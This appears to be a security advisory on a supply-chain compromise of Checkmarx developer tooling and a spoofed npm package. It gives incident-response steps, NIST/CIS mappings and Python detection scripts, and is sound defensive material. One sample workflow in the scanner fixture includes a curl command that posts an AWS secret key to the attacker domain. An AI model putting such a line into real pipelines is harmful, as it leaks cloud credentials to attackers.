Severity: CRITICAL | CVSS: 9.5 | Priority: 0.932
Executive Summary
TeamPCP, an active threat actor targeting developer security tooling, has compromised several Checkmarx distribution channels at once (KICS Docker images, the Checkmarx AST GitHub Action and two VS Code extensions) and paired them with a spoofed npm package, in the third wave of its supply chain campaign. The attack targets the CI/CD pipelines of organizations that use Checkmarx DevSecOps tooling, meaning the very tools deployed to enforce security are the entry point. Any organization running affected Checkmarx components in its software delivery pipeline should treat this as an active compromise until investigation confirms otherwise.
Impact Assessment
CISA KEV Status: Not listed
Threat Severity: CRITICAL (immediate action required)
Actor Attribution: HIGH (TeamPCP)
TTP Sophistication: HIGH (22 MITRE ATT&CK techniques identified)
Detection Difficulty: HIGH (multiple evasion techniques observed)
Target Scope: Checkmarx KICS Docker images, Checkmarx AST GitHub Action, Checkmarx AST Results VS Code extension, CX Dev Assist VS Code extension, npm ecosystem (@bitwarden/cli impersonation package), AWS SSM, Azure Key Vault, Google Cloud Secret Manager, GitHub Actions CI/CD environments, VS Code, Docker Hub
Business Context
An attacker who gains execution inside a Checkmarx DevSecOps pipeline operates with the same trust level as your own development team — able to read every secret your build process touches, modify code before it ships, and propagate through every connected repository. The wormable propagation mechanism means a single compromised pipeline can spread to dozens or hundreds of repositories before detection, potentially poisoning software that your customers or internal systems rely on. Organizations in regulated industries face compounded exposure: secrets harvested from cloud vaults may include credentials for production systems handling regulated data, and any downstream code modifications could introduce vulnerabilities into products subject to SOC 2, ISO 27001, or sector-specific compliance requirements.
You Are Affected If
Your CI/CD pipelines reference Checkmarx KICS Docker images pulled from Docker Hub
Your GitHub Actions workflows use the Checkmarx AST GitHub Action
Developers in your organization have the Checkmarx AST Results or CX Dev Assist VS Code extensions installed
Your pipelines include @bitwarden/cli as a dependency, particularly any environment pinned to or auto-resolving to version 2026.4.0
Your CI/CD service accounts have read access to AWS SSM, Azure Key Vault, or Google Cloud Secret Manager and were active during the exposure window
Board Talking Points
Attackers compromised the security scanning tools embedded in our software development process, giving them access to the credentials and code repositories those tools interact with.
We are conducting an immediate audit of all affected pipelines and rotating exposed credentials — this should be treated as a priority incident requiring dedicated response resources this week.
Without containment and remediation, this attack can propagate silently across our entire codebase and cloud environment, potentially resulting in data loss, regulatory breach notification obligations, and compromised software reaching customers.
SOC 2 — CI/CD pipelines and cloud secret stores are in scope for availability, confidentiality, and security trust service criteria; compromise may require incident disclosure to auditors
ISO/IEC 27001 — Secret and credential compromise in cloud key management services directly implicates Annex A controls for cryptographic key management and access control
PCI-DSS — If any harvested AWS SSM, Azure Key Vault, or GCP Secret Manager secrets contain cardholder data environment credentials, a reportable security incident may be triggered under Requirement 12.10
Technical Analysis
TeamPCP's Wave 3 supply chain attack (April 2026) is a multi-vector compromise affecting Checkmarx KICS Docker Hub images, the Checkmarx AST GitHub Action, the Checkmarx AST Results VS Code extension, and the CX Dev Assist VS Code extension.
A spoofed npm package (@bitwarden/cli v2026.4.0) served as an additional vector, impersonating the legitimate Bitwarden CLI used in developer pipelines.
All vectors share a unified C2 infrastructure at audit.checkmarx[.]cx, a typosquatted domain impersonating the legitimate vendor.
Payload behavior maps to CWE-798 (hard-coded credentials), CWE-506 (embedded malicious code), CWE-829 (inclusion of functionality from an untrusted control sphere), CWE-312 (cleartext storage of sensitive information) and CWE-494 (download of code without integrity check). Once executed, the payload harvests credentials and secrets from AWS SSM Parameter Store, Azure Key Vault, Google Cloud Secret Manager, GitHub tokens and local developer workstations (T1552.004, T1555, T1552.001). The worm component (T1195.001, T1195.002) then injects malicious GitHub Actions workflows into every repository the compromised identity can push to (T1098, T1136.003), propagating laterally across the victim's supply chain. Obfuscation (T1027) and defense evasion by disabling security controls (T1562.001) are also documented.
No CVE identifier has been issued at this time. Patch status: consult official Checkmarx advisories for confirmed clean artifact hashes and remediated versions.
Action Checklist (IR enriched)
Triage Priority: IMMEDIATE
Escalate to the CISO, legal counsel and the relevant cloud provider security teams immediately if CloudTrail, Key Vault diagnostic logs or GCP Audit Logs show secret reads (AWS ssm:GetParameter/GetParameters or secretsmanager:GetSecretValue, Azure Key Vault SecretGet, GCP AccessSecretVersion) by CI/CD identities during the exposure window that do not match those pipelines' normal job pattern. A secret read by a pipeline run that executed a compromised artifact should be treated as exfiltrated; that is a credential breach and may trigger regulatory notification obligations (SOC 2, PCI-DSS, GDPR or state breach notification laws, depending on the secrets' scope). Also escalate if any repository that received pushes from the compromised identity contains production deployment workflows, as this extends the blast radius beyond the CI/CD environment to production systems.
Step 1: Containment. Immediately suspend all CI/CD pipeline jobs that reference the Checkmarx KICS Docker images, the Checkmarx AST GitHub Action, the Checkmarx AST Results VS Code extension or the CX Dev Assist VS Code extension. Block outbound connections to audit.checkmarx[.]cx at perimeter and endpoint DNS. Revoke all GitHub tokens, AWS IAM credentials with SSM or Secrets Manager access, Azure Key Vault credentials and GCP Secret Manager service-account keys used in affected pipelines, pending rotation.
IR Detail
Containment
NIST 800-61r3 §3.3 — Containment Strategy
NIST IR-4 (Incident Handling)
NIST AC-2 (Account Management)
NIST SC-7 (Boundary Protection)
CIS 4.4 (Implement and Manage a Firewall on Servers)
CIS 6.2 (Establish an Access Revoking Process)
Compensating Control
For teams without enterprise NAC/DNS filtering: push an immediate hosts-file entry (`0.0.0.0 audit.checkmarx.cx`) via Group Policy or Ansible to all CI/CD runner nodes and developer workstations. For GitHub Actions: use the GitHub CLI (`gh secret delete <SECRET_NAME> --repo <owner/repo>`) to remove exposed secrets from affected repositories immediately. For the IAM access keys a pipeline uses to reach SSM or Secrets Manager: run `aws iam list-access-keys --user-name <ci-user>` followed by `aws iam delete-access-key --user-name <ci-user> --access-key-id <key>` for each key listed; pipelines that assume a role through OIDC have no long-lived key, so cut their existing sessions with a deny policy on the role instead. For Azure: `az ad sp credential reset --id <app-id-or-object-id>` replaces every existing credential on the service principal (do not pass `--append`, which would keep the old ones). Document every revocation with a timestamp for the incident timeline.
Preserve Evidence
Export and preserve the full GitHub Actions workflow run logs for all runs that referenced checkmarx/ast-github-action or pulled an image from the checkmarx/kics namespace on Docker Hub (suspending the pipelines does not delete these, but the retention window does); the logs contain the exact timestamps and injected step output that show whether audit.checkmarx[.]cx was contacted. Capture AWS CloudTrail `GetParameter` and `GetSecretValue` events (EventName filter) for the CI/CD IAM role ARNs in the exposure window; these confirm whether SSM parameters or Secrets Manager values were read. Preserve Azure Key Vault diagnostic (audit) logs filtered on `SecretGet` operations by the affected service principal's object ID before credential revocation breaks the attribution chain; these are data-plane events and do not appear in the Azure Activity Log.
Step 2: Detection. Query CI/CD logs and GitHub Actions workflow history for any reference to audit.checkmarx[.]cx or @bitwarden/cli v2026.4.0. Search npm lockfiles (package-lock.json, yarn.lock, pnpm-lock.yaml) across all repositories for @bitwarden/cli resolved to version 2026.4.0. Review Docker pull history for KICS images pulled from Docker Hub after 2026-04-01. Audit GitHub Actions workflow files for newly injected steps or unexpected uses of the secrets context. Check cloud provider access logs (AWS CloudTrail, Azure Key Vault diagnostic logs, GCP Audit Logs) for unexpected SSM, Key Vault or Secret Manager reads originating from CI/CD service accounts.
IR Detail
Detection & Analysis
NIST 800-61r3 §3.2 — Detection and Analysis
NIST SI-4 (System Monitoring)
NIST AU-6 (Audit Record Review, Analysis, and Reporting)
NIST AU-2 (Event Logging)
NIST IR-5 (Incident Monitoring)
CIS 8.2 (Collect Audit Logs)
CIS 7.1 (Establish and Maintain a Vulnerability Management Process)
Compensating Control
Run the following across all cloned repositories to locate the malicious npm package; in every lockfile format the resolved version sits a few lines below the package name, so grab context rather than filtering a single line: `grep -rEn -A4 '@bitwarden/cli' . --include=package-lock.json --include=yarn.lock --include=pnpm-lock.yaml | grep -E '2026\.4\.0'`. For GitHub Actions workflow injection detection, run `grep -rn 'audit\.checkmarx' .github/workflows/ --include='*.yml' --include='*.yaml'` and separately `grep -rnoE 'secrets\.[A-Za-z_][A-Za-z0-9_]*' .github/workflows/ | sort -u` to surface any secrets context references not present in baseline workflow snapshots. For Docker pull history on Linux CI runners without a SIEM, inspect `/var/lib/docker/containers/*/config.v2.json` (the `Image` field records what each container ran) and the Docker daemon journal via `journalctl -u docker`, filtering on 'checkmarx/kics'. Use `git log --all --since=<campaign-start> --diff-filter=A -- '.github/workflows/*.yml' '.github/workflows/*.yaml'` in each repository to enumerate workflow files added during the TeamPCP exposure window.
Preserve Evidence
Capture DNS query logs from all CI/CD runner hosts for resolutions of 'audit.checkmarx.cx'. On Linux runners without a DNS proxy, systemd-resolved only records individual queries when running at debug log level, so check `journalctl -u systemd-resolved | grep audit.checkmarx` and fall back to upstream resolver query logs or any packet capture that was running. Pull the complete GitHub Actions log bundles (downloadable as zip via the GitHub API: `GET /repos/{owner}/{repo}/actions/runs/{run_id}/logs`) before GitHub's default 90-day log retention expires; these contain the raw stdout of any injected exfiltration step. Preserve the npm package tarball of @bitwarden/cli v2026.4.0 from the npm cache on affected build nodes (typically `~/.npm/_cacache/` or the runner's npm cache directory) for malware analysis and hash comparison against the legitimate Bitwarden package.
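The Step 2 checks above (lockfile scan, C2 reference in workflows, secrets context drift against a baseline) combined into one repository scanner, as an added example that is not part of the original advisory or of any Checkmarx or Bitwarden tooling. It uses only the Python standard library, walks a directory of cloned repositories, and runs here on a small constructed sample tree: the repository names, workflow content and baseline snapshot are made up for the demo, while the C2 domain and package version are the page's own IOCs.

```python
"""Scan cloned repositories for the Wave 3 indicators: the spoofed @bitwarden/cli
release resolved in a lockfile, workflow files that reference the C2 domain, and
secrets-context references that were not in the pre-incident baseline snapshot."""
import json
import re
import tempfile
from pathlib import Path

C2_DOMAIN = "audit.checkmarx.cx"
BAD_PACKAGE, BAD_VERSION = "@bitwarden/cli", "2026.4.0"
LOCKFILES = ("package-lock.json", "yarn.lock", "pnpm-lock.yaml")
SECRET_REF = re.compile(r"secrets\.([A-Za-z_][A-Za-z0-9_]*)")
# yarn/pnpm carry the pin in the entry header ("@bitwarden/cli@2026.4.0") or on a
# "version" line a few lines below a range header ("@bitwarden/cli@^2026.4.0").
PINNED_IN_HEADER = re.compile(re.escape(BAD_PACKAGE) + r"[@/]" + re.escape(BAD_VERSION) + r"(?![\d.])")
RESOLVED_VERSION = re.compile(r'version:?\s+"?' + re.escape(BAD_VERSION) + r'"?\s*$')


def lockfile_pins_bad_version(name: str, text: str) -> bool:
    """True if the lockfile resolves BAD_PACKAGE to BAD_VERSION."""
    if name == "package-lock.json":
        data = json.loads(text)
        # lockfileVersion 2/3 keys entries by install path; v1 nests "dependencies".
        for path, meta in data.get("packages", {}).items():
            if path.endswith("node_modules/" + BAD_PACKAGE) and meta.get("version") == BAD_VERSION:
                return True
        return data.get("dependencies", {}).get(BAD_PACKAGE, {}).get("version") == BAD_VERSION
    lines = text.splitlines()
    for i, line in enumerate(lines):
        if BAD_PACKAGE in line and (PINNED_IN_HEADER.search(line)
                                     or any(RESOLVED_VERSION.search(nxt) for nxt in lines[i + 1:i + 6])):
            return True
    return False


def scan_workflow(text: str) -> dict:
    """Return the lines mentioning the C2 domain and the secret names the workflow uses."""
    return {
        "c2_refs": [ln.strip() for ln in text.splitlines() if C2_DOMAIN in ln],
        "secrets": set(SECRET_REF.findall(text)),
    }


def scan_tree(root: Path, baseline_secrets: dict) -> list:
    """Walk cloned repositories under root. baseline_secrets maps a workflow's
    root-relative path to the set of secret names it referenced before the window."""
    findings = []
    for path in sorted(p for p in root.rglob("*") if p.is_file()):
        rel = path.relative_to(root).as_posix()
        if path.name in LOCKFILES and lockfile_pins_bad_version(path.name, path.read_text()):
            findings.append((rel, f"{BAD_PACKAGE}@{BAD_VERSION} resolved"))
        if "/.github/workflows/" in "/" + rel and path.suffix in (".yml", ".yaml"):
            result = scan_workflow(path.read_text())
            findings.extend((rel, "C2 reference: " + ref) for ref in result["c2_refs"])
            new = result["secrets"] - baseline_secrets.get(rel, set())
            if new:
                findings.append((rel, "secrets not in baseline: " + ", ".join(sorted(new))))
    return findings


# Constructed sample repositories: the lockfile and workflow content is illustrative,
# not the real Checkmarx or Bitwarden artifacts.
SAMPLE_FILES = {
    "repo-a/package-lock.json": json.dumps({"lockfileVersion": 3, "packages": {
        "node_modules/@bitwarden/cli": {"version": "2026.4.0"}}}),
    "repo-a/.github/workflows/ci.yml": (
        "name: ci\non: push\njobs:\n  build:\n    runs-on: ubuntu-latest\n    steps:\n"
        "      - uses: actions/checkout@v4\n"
        "      - run: curl -s https://audit.checkmarx.cx/x -d \"$AWS_SECRET_ACCESS_KEY\"\n"
        "        env:\n          AWS_SECRET_ACCESS_KEY: ${{ secrets.AWS_SECRET_ACCESS_KEY }}\n"
        "          TOKEN: ${{ secrets.GITHUB_TOKEN }}\n"),
    "repo-b/yarn.lock": '"@bitwarden/cli@^2026.3.0":\n  version "2026.3.2"\n',
    "repo-b/.github/workflows/build.yml": (
        "name: build\non: push\njobs:\n  test:\n    runs-on: ubuntu-latest\n    steps:\n"
        "      - run: npm test\n        env:\n          TOKEN: ${{ secrets.GITHUB_TOKEN }}\n"),
}
BASELINE_SECRETS = {  # snapshot taken before the exposure window (constructed)
    "repo-a/.github/workflows/ci.yml": {"GITHUB_TOKEN"},
    "repo-b/.github/workflows/build.yml": {"GITHUB_TOKEN"},
}


def demo() -> list:
    """Materialise the sample tree in a temp dir and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        for rel, content in SAMPLE_FILES.items():
            (Path(tmp) / rel).parent.mkdir(parents=True, exist_ok=True)
            (Path(tmp) / rel).write_text(content)
        return scan_tree(Path(tmp), BASELINE_SECRETS)


if __name__ == "__main__":
    for rel, finding in demo():
        print(f"{rel}: {finding}")
```

Point `scan_tree` at the directory holding your clones and feed it a baseline built from pre-incident workflow snapshots. A lockfile hit means the runner resolved the spoofed release even when package.json only names a range, and a secrets-context name that is absent from the baseline is exactly what an injected exfiltration step needs in order to read a secret.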
Step 3: Eradication. Replace all affected Checkmarx artifacts with versions confirmed clean by Checkmarx's official advisory, verifying artifact integrity hashes before re-deployment. Remove @bitwarden/cli v2026.4.0 from all dependency manifests and lockfiles and replace it with the verified legitimate package from the public npm registry, confirming the resolved URL and integrity hash. Audit every repository the compromised identity had push access to and revert any injected workflow files. Remove or disable the affected VS Code extensions pending confirmed clean versions from Checkmarx.
IR Detail
Eradication
NIST 800-61r3 §3.4 — Eradication
NIST SI-2 (Flaw Remediation)
NIST SI-7 (Software, Firmware, and Information Integrity)
NIST CM-3 (Configuration Change Control)
NIST IR-4 (Incident Handling)
CIS 2.2 (Ensure Authorized Software is Currently Supported)
CIS 2.3 (Address Unauthorized Software)
CIS 7.2 (Establish and Maintain a Remediation Process)
Compensating Control
Verify Docker image integrity before re-deployment: `docker pull checkmarx/kics:<clean-tag>` followed by `docker inspect --format='{{index .RepoDigests 0}}' checkmarx/kics:<clean-tag>`, and compare the sha256 digest against the digest published in Checkmarx's official advisory; then pin the digest (`checkmarx/kics@sha256:<digest>`) in pipeline references rather than the mutable tag. For the npm package replacement, after removing v2026.4.0 from manifests and lockfiles, run `npm install @bitwarden/cli@<verified-version> --registry https://registry.npmjs.org` and then `npm audit signatures` (npm 8.13 or later, no extra tooling) to validate the registry signature and, where present, the provenance attestation. For VS Code extension removal on developer workstations without MDM, distribute a one-liner such as `code --uninstall-extension checkmarx.ast-results --uninstall-extension checkmarx.cx-dev-assist` via a PowerShell/bash script pushed through your configuration management tool, after confirming the exact extension IDs with `code --list-extensions` on an affected workstation. Use `git log --since=<campaign-start-date> -p -- .github/workflows/` on each repository to diff workflow changes during the exposure window (add `--author=<pattern>` to focus on the compromised identity) and revert injected steps with `git revert <commit-hash>`.
Preserve Evidence
Before reverting injected workflow files, preserve the malicious workflow YAML content verbatim — capture a `git show <commit-hash>` of each injected commit and store the output as a forensic artifact. This preserves the injected step logic (likely curl/wget to audit.checkmarx[.]cx or an exfil command), the attacker's commit identity, and the timestamp for the incident timeline. Document the file hash (SHA256) of the @bitwarden/cli v2026.4.0 tarball cached on build nodes using `sha256sum ~/.npm/_cacache/content-v2/sha512/<hash-path>` — this hash is needed to confirm whether other packages in the same registry batch were similarly tampered, and may be requested by Checkmarx or law enforcement.
Step 4: Recovery. Rotate all secrets that were accessible during the exposure window: GitHub personal access tokens and Actions secrets, AWS IAM credentials with SSM or Secrets Manager access, Azure service principals with Key Vault access, GCP service accounts with Secret Manager access. Validate artifact integrity checksums against Checkmarx-published hashes before re-enabling pipelines. Re-enable pipelines in a staged manner with enhanced logging. Monitor for anomalous repository commits, unexpected workflow additions or unusual cloud API calls for a minimum of 30 days post-remediation.
IR Detail
Recovery
NIST 800-61r3 §3.5 — Recovery
NIST IR-4 (Incident Handling)
NIST IA-5 (Authenticator Management)
NIST CP-10 (System Recovery and Reconstitution)
NIST AU-12 (Audit Record Generation)
CIS 5.2 (Use Unique Passwords)
CIS 6.3 (Require MFA for Externally-Exposed Applications)
CIS 7.3 (Perform Automated Operating System Patch Management)
Compensating Control
For secret rotation without a secrets management platform: use the GitHub CLI to rotate Actions secrets programmatically (`gh secret set <SECRET_NAME> --repo <owner/repo> --body <new-value>`), and enumerate all repositories that shared the compromised secret by querying `gh api /repos/{owner}/{repo}/actions/secrets` across your org. For 30-day post-recovery monitoring without a SIEM, configure GitHub repository webhooks to POST `push`, `workflow_run`, and `create` events to a lightweight listener (e.g., a Python Flask app or smee.io proxy) and alert on any `.github/workflows/` file changes or new workflow runs referencing external Docker registries. For AWS CloudTrail without a SIEM, schedule a daily Lambda or `aws cloudtrail lookup-events --lookup-attributes AttributeKey=EventName,AttributeValue=GetSecretValue` cron job and diff outputs against a post-rotation baseline.
Preserve Evidence
Before re-enabling any pipeline, capture a fresh baseline snapshot of all GitHub Actions workflow files (hash every workflow file across all repositories with `find . -path '*/.github/workflows/*' \( -name '*.yml' -o -name '*.yaml' \) -exec sha256sum {} \;`) and store the listing outside the repositories; it is your integrity reference for the 30-day monitoring period. For cloud provider monitoring, establish a baseline of expected `GetParameter`, `GetSecretValue` and `AccessSecretVersion` call volumes per CI/CD service account identity from pre-incident CloudTrail/GCP Audit Logs, and alert on any deviation above 2x the baseline during the monitoring window, or on any secret read by an identity that has no baseline at all; either would indicate a credential that survived rotation being used by TeamPCP infrastructure.
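The call-volume baseline described above, as an added example that is not the advisory's own tooling: it takes pre-incident CloudTrail records, computes each CI identity's mean daily secret reads, and flags monitoring-window days above 2x that mean as well as reads from an identity that has no baseline at all. Records can come from S3 trail files or from `aws cloudtrail lookup-events` output. The sample records, account ID and role names below are constructed, and the 2x factor is the page's threshold, not a calibrated one.

```python
"""Post-recovery monitoring of cloud secret reads: build a per-identity daily
baseline of SSM / Secrets Manager read calls from pre-incident CloudTrail records,
then flag identities whose volume in the monitoring window exceeds 2x that baseline
or that never read secrets before the incident at all."""
import json
from collections import defaultdict

SECRET_READ_EVENTS = {
    ("ssm.amazonaws.com", "GetParameter"),
    ("ssm.amazonaws.com", "GetParameters"),
    ("ssm.amazonaws.com", "GetParametersByPath"),
    ("secretsmanager.amazonaws.com", "GetSecretValue"),
}


def load_records(text: str) -> list:
    """Accept either an S3 trail file ({"Records": [...]}) or `aws cloudtrail
    lookup-events` output, whose CloudTrailEvent field is a JSON-encoded string."""
    data = json.loads(text)
    if "Records" in data:
        return data["Records"]
    return [json.loads(e["CloudTrailEvent"]) for e in data.get("Events", [])]


def caller_arn(record: dict) -> str:
    """Attribute assumed-role sessions to the role, not the per-run session name."""
    ident = record.get("userIdentity", {})
    issuer = ident.get("sessionContext", {}).get("sessionIssuer", {})
    return issuer.get("arn") or ident.get("arn", "unknown")


def daily_read_counts(records) -> dict:
    """identity ARN -> {YYYY-MM-DD: number of secret-read calls}."""
    counts = defaultdict(lambda: defaultdict(int))
    for rec in records:
        if (rec.get("eventSource"), rec.get("eventName")) in SECRET_READ_EVENTS:
            counts[caller_arn(rec)][rec["eventTime"][:10]] += 1
    return counts


def baseline_means(baseline_records) -> dict:
    """Mean reads per active day for each identity in the pre-incident window."""
    return {arn: sum(days.values()) / len(days)
            for arn, days in daily_read_counts(baseline_records).items()}


def find_anomalies(baseline_records, monitored_records, factor: float = 2.0) -> list:
    """(day, identity, reads, reason) for every day that breaks the baseline."""
    means = baseline_means(baseline_records)
    alerts = []
    for arn, days in daily_read_counts(monitored_records).items():
        for day, n in sorted(days.items()):
            if arn not in means:
                alerts.append((day, arn, n, "identity absent from baseline"))
            elif n > factor * means[arn]:
                alerts.append((day, arn, n, f"{n / means[arn]:.1f}x baseline"))
    return alerts


def make_record(when: str, role: str, source: str, name: str) -> dict:
    """Minimal constructed CloudTrail record for an assumed-role session."""
    return {"eventTime": when, "eventSource": source, "eventName": name,
            "userIdentity": {"type": "AssumedRole",
                             "arn": role.replace(":role/", ":assumed-role/") + "/gha-run",
                             "sessionContext": {"sessionIssuer": {"arn": role}}}}


# Constructed sample data: the account ID and role names are placeholders.
CI_ROLE = "arn:aws:iam::123456789012:role/ci-deploy"
ROGUE_ROLE = "arn:aws:iam::123456789012:role/kics-scan"
SSM, SM = "ssm.amazonaws.com", "secretsmanager.amazonaws.com"
# Pre-incident week: ci-deploy reads two parameters and one secret per nightly run.
BASELINE = [make_record(f"2026-03-{d:02d}T02:00:{s:02d}Z", CI_ROLE, src, ev)
            for d in range(20, 27)
            for s, src, ev in ((0, SSM, "GetParameter"), (5, SSM, "GetParameter"), (9, SM, "GetSecretValue"))]
# Monitoring window: a normal night, then a burst of secret reads and a role that
# never touched secrets before. DescribeParameters is not a read and is ignored.
MONITORED = (
    [make_record("2026-05-01T02:00:00Z", CI_ROLE, SSM, "GetParameter")] * 2
    + [make_record("2026-05-01T02:00:09Z", CI_ROLE, SM, "GetSecretValue")]
    + [make_record("2026-05-02T03:00:00Z", CI_ROLE, SM, "GetSecretValue")] * 9
    + [make_record("2026-05-02T03:05:00Z", ROGUE_ROLE, SSM, "GetParametersByPath"),
       make_record("2026-05-02T03:06:00Z", ROGUE_ROLE, SSM, "DescribeParameters")]
)

if __name__ == "__main__":
    for day, arn, n, why in find_anomalies(BASELINE, MONITORED):
        print(f"{day} {arn} reads={n} ({why})")
```

Attribution is to the session issuer role, so a burst from a re-issued session still surfaces under the role name that the baseline knows. Azure Key Vault and GCP audit logs need only a different `caller_arn` and event filter to feed the same `find_anomalies`.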
Step 5: Post-Incident. This attack succeeded by compromising trusted security tooling, bypassing controls that rely on the trustworthiness of the source. Implement artifact integrity verification (e.g. Sigstore/cosign for container images, npm provenance attestation) across all CI/CD pipelines. Enforce least privilege for CI/CD service accounts: no pipeline identity should have push access to repositories beyond its defined scope. Add DNS monitoring for typosquatted vendor domains as a standing detection control. Review the MITRE ATT&CK Supply Chain Compromise techniques (T1195.001, T1195.002) against your current control coverage and identify gaps.
IR Detail
Post-Incident
NIST 800-61r3 §4 — Post-Incident Activity
NIST IR-4 (Incident Handling)
NIST IR-8 (Incident Response Plan)
NIST SI-7 (Software, Firmware, and Information Integrity)
NIST SA-12 (Supply Chain Risk Management)
NIST AC-6 (Least Privilege)
CIS 7.1 (Establish and Maintain a Vulnerability Management Process)
CIS 2.1 (Establish and Maintain a Software Inventory)
Compensating Control
Implement Sigstore/cosign (free, open source) for container image verification by adding a cosign verify step to every GitHub Actions workflow that pulls a Checkmarx or other security-tooling image: `cosign verify --certificate-identity-regexp '.*checkmarx.*' --certificate-oidc-issuer https://token.actions.githubusercontent.com <image-ref>`. This only works if the vendor signs keyless from GitHub Actions, and the regexp should be tightened to the vendor's documented signing workflow identity: a loose `.*checkmarx.*` would also accept a signature from any attacker-controlled repository with checkmarx in its name. For npm, run `npm audit signatures` after every `npm ci` in CI; it is a built-in npm CLI command requiring no additional tooling, fails on an invalid registry signature and reports packages that carry none. For DNS typosquatting detection as a standing control, log DNS on your perimeter or runner network (free via Zeek's dns.log or Suricata's EVE dns events), run weekly `dnstwist checkmarx.com` (free tool) to generate a watchlist of likely typosquats, then alert on any CI/CD runner DNS query whose registered domain is on that list. Map T1195.001 (Compromise Software Dependencies and Development Tools) and T1195.002 (Compromise Software Supply Chain) gaps against your pipeline inventory and document findings in the lessons-learned report required by NIST 800-61r3 §4.
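The typosquat watchlist and DNS match described above, as an added example that is neither dnstwist itself nor part of the original page. `typosquat_watchlist` generates a subset of the permutations dnstwist produces (omission, repetition, transposition, hyphenation, a few homoglyphs, TLD swaps; the TLD and homoglyph tables are assumptions chosen for the demo), and `match_zeek_dns` parses a Zeek dns.log using its `#fields` header and reports queries whose registered domain is on the list. The log excerpt and addresses are constructed.

```python
"""Standing detection for vendor look-alike domains: build a watchlist of likely
typosquats of a vendor domain (a subset of the permutations dnstwist generates) and
match CI runner DNS queries from a Zeek dns.log against it."""

TLD_SWAPS = ("cx", "co", "cm", "cc", "io", "net", "org")       # assumed demo table
HOMOGLYPHS = {"m": ("rn",), "l": ("1", "i"), "i": ("l", "1"), "o": ("0",), "a": ("4",)}


def typosquat_watchlist(domain: str) -> set:
    """Registered-domain look-alikes of e.g. 'checkmarx.com', excluding the original."""
    label, tld = domain.lower().rsplit(".", 1)
    labels = set()
    for i, ch in enumerate(label):
        labels.add(label[:i] + label[i + 1:])                        # omission: chekmarx
        labels.add(label[:i] + ch + label[i:])                       # repetition: checkkmarx
        if i:
            labels.add(label[:i] + "-" + label[i:])                  # hyphenation: check-marx
        if i + 1 < len(label):
            labels.add(label[:i] + label[i + 1] + ch + label[i + 2:])  # transposition: chekcmarx
        for sub in HOMOGLYPHS.get(ch, ()):
            labels.add(label[:i] + sub + label[i + 1:])              # homoglyph: checkrnarx
    watch = {f"{lb}.{tld}" for lb in labels}
    watch |= {f"{label}.{t}" for t in TLD_SWAPS if t != tld}         # TLD swap: checkmarx.cx
    watch.discard(domain.lower())
    return watch


def registered_domain(qname: str) -> str:
    """Last two labels of a query name; Zeek may log a trailing dot."""
    parts = qname.rstrip(".").lower().split(".")
    return ".".join(parts[-2:])


def match_zeek_dns(log_text: str, watchlist: set) -> list:
    """(ts, client, query, matched domain) for every query whose registered domain
    is on the watchlist. Column positions are read from the #fields header line."""
    fields, hits = None, []
    for line in log_text.splitlines():
        if line.startswith("#fields"):
            fields = line.split("\t")[1:]
        elif line.startswith("#") or not line.strip() or fields is None:
            continue
        else:
            row = dict(zip(fields, line.split("\t")))
            dom = registered_domain(row["query"])
            if dom in watchlist:
                hits.append((row["ts"], row["id.orig_h"], row["query"], dom))
    return hits


# Constructed Zeek dns.log excerpt (abbreviated field set); addresses are placeholders.
SAMPLE_DNS_LOG = "\n".join([
    "#separator \\x09",
    "#fields\tts\tuid\tid.orig_h\tid.orig_p\tid.resp_h\tid.resp_p\tproto\tquery\tqtype_name\trcode_name",
    "1776988800.1\tC1\t10.0.5.21\t51000\t10.0.0.2\t53\tudp\tregistry.npmjs.org\tA\tNOERROR",
    "1776988801.2\tC2\t10.0.5.21\t51001\t10.0.0.2\t53\tudp\taudit.checkmarx.cx\tA\tNOERROR",
    "1776988802.3\tC3\t10.0.5.22\t51002\t10.0.0.2\t53\tudp\tast.checkmarx.com\tA\tNOERROR",
    "1776988803.4\tC4\t10.0.5.22\t51003\t10.0.0.2\t53\tudp\tapi.checkrnarx.com.\tA\tNXDOMAIN",
])
KNOWN_VENDOR_OWNED = set()  # add look-alikes the vendor has confirmed it owns

if __name__ == "__main__":
    watch = typosquat_watchlist("checkmarx.com") - KNOWN_VENDOR_OWNED
    for ts, client, query, dom in match_zeek_dns(SAMPLE_DNS_LOG, watch):
        print(f"{ts} {client} queried {query} (matches watchlist entry {dom})")
```

Run the weekly dnstwist output through the same registered-domain match if you prefer its fuller permutation set. Either way, subtract the look-alikes the vendor has confirmed it owns before alerting, and keep the match on the registered domain so that an arbitrary host label such as `audit.` cannot slip past a watchlist of bare domains.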
Preserve Evidence
For the lessons-learned report, compile the complete attack timeline using GitHub Actions run timestamps, CloudTrail/GCP Audit Log entries, and DNS query logs to establish exactly when each Checkmarx artifact was first pulled post-compromise, how long the exposure window lasted, and which secrets were in scope during that window — this timeline is the evidentiary foundation for any regulatory breach notification assessment and for updating the IR plan per NIST IR-8 (Incident Response Plan).
Recovery Guidance
Before re-enabling any Checkmarx-dependent pipeline, independently verify the SHA256 hash of every replacement artifact (KICS Docker image digest, AST GitHub Action pinned commit SHA, VS Code extension VSIX hash) against values published in Checkmarx's official advisory — do not trust Docker Hub tags alone, as tags are mutable. Re-enable pipelines one at a time in non-production environments first, with enhanced logging capturing every outbound network connection from the runner and every secrets context access, and validate clean operation for at least 72 hours before promoting to production pipelines. Maintain heightened monitoring for anomalous GitHub workflow additions, unexpected cloud secret reads, and DNS lookups to checkmarx-adjacent domains for a minimum of 30 days, as TeamPCP's Shai-Hulud campaign history (Wave 1, Wave 2) demonstrates a pattern of re-entry through residual access after initial remediation.
Key Forensic Artifacts
GitHub Actions workflow run logs (downloadable via GitHub API as zip bundles) for all runs referencing checkmarx/ast-github-action or checkmarx/kics during the TeamPCP exposure window — these contain stdout output of any injected exfiltration step sending data to audit.checkmarx[.]cx, including any base64-encoded secret values captured by the malicious action
DNS query logs from CI/CD runner hosts for resolutions of 'audit.checkmarx.cx' — obtainable from systemd-resolved journals, Zeek dns.log, or perimeter DNS resolver query logs; the presence and timing of these queries establishes the exfiltration window and whether the C2 domain was successfully reached
AWS CloudTrail 'GetParameter' and 'GetSecretValue' events filtered by CI/CD IAM role ARNs during the exposure window — these records confirm whether SSM parameters or Secrets Manager values were read by the compromised pipeline identity and are the primary evidence for cloud credential exfiltration scope
npm cache tarballs of @bitwarden/cli v2026.4.0 preserved from build node npm cache directories (typically ~/.npm/_cacache/ on Linux runners) — the package contents and SHA512 integrity hash confirm the specific malicious payload version and can be submitted to Checkmarx, Bitwarden, and npm security teams for coordinated disclosure and cross-organizational IOC sharing
